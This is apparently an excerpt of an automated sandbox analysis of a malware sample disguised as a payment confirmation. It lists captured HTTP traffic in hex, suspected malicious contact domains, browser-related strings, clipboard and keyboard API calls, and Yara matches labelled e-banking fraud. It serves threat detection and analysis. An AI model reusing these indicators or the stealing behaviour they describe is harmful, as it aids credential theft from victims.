a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 
8d 33 aa 4c ea 5c e4 d5 42 67 b1 ad 96 cf 9d a6 31 88 48 6c f9 e8 1a 6e e2 3e a9 9f f5 85 5e d6 b3 6a a8 ef 34 82 c7 e0 b6 be 8d 8b 1f 5b 0c 8c 0a 5a b7 35 0a ac 63 68 10 ba 68 03 ce 02 6b 0a 10 d0 8f e8 2f aa c5 50 cf aa 85 a2 b1 3e cd 4f 28 3d 35 4d 27 a2 3c cb 72 39 ec Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 08:11:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Md21SjjXZTTrzwKPSfI2netjJE7iPK2stIFIbp%2BjdGa3PU%2FuJjS9woUOCkN9Yp%2B33VpFiBHSPVecsQuj5nvKhFW1IIribN4xvm94VL0tyTv%2BRzWSbhiQ6GLwl8sPV6Sjfpw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c162fa0f992424d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 
aa 4c ea 5c e4 d5 42 67 b1 ad 96 cf 9d a6 31 88 48 6c f9 e8 1a 6e e2 3e a9 9f f5 85 5e d6 b3 6a a8 ef 34 82 c7 e0 b6 be 8d 8b 1f 5b 0c 8c 0a 5a b7 35 0a ac 63 68 10 ba 68 03 ce 02 6b 0a 10 d0 8f e8 2f aa c5 50 cf aa 85 a2 b1 3e cd 4f 28 3d 35 4d 27 a2 3c cb 72 39 ec cb 53 fa 53 85 06 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 08:11:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JifVl%2Feh2TXRNbetTliwOifvDzVqBTClE6Fbe7njkl03juwr3DZNmLBTbbn5lHNISqqaxcr2R7uPNnzuYehs9F1InRGImEdiDv8GUi5D8QZLfWtoqR0dqYp3CmxByRcbX%2BWq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c162fb0e8577291-EWRalt-svc: h3=":443"; ma=86400Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 
3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:11:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:11:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:11:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:11:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:11:32 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: xONxwdydvq.exe, 00000003.00000002.745450083.000000000044C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top
            Source: xONxwdydvq.exe, 00000003.00000002.745450083.000000000044C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top/ed2j/
            Source: RMActivate_ssp.exe, 00000004.00000002.746268139.0000000061EA5000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: xONxwdydvq.exe, 00000003.00000002.746297118.0000000005742000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745738795.0000000003702000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: RMActivate_ssp.exe, 00000004.00000003.441582208.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp, 7466H3538.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 7466H3538.4.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: xONxwdydvq.exe, 00000003.00000002.746297118.00000000055B0000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745738795.0000000003570000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.mfgamecompany.shop/lwt6/?OlTXe=j/d5AuZ
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01337099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_01337099
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01337294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01337294
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01337099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_01337099
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01324342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_01324342
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0134F5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0134F5D0

E-Banking Fraud

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
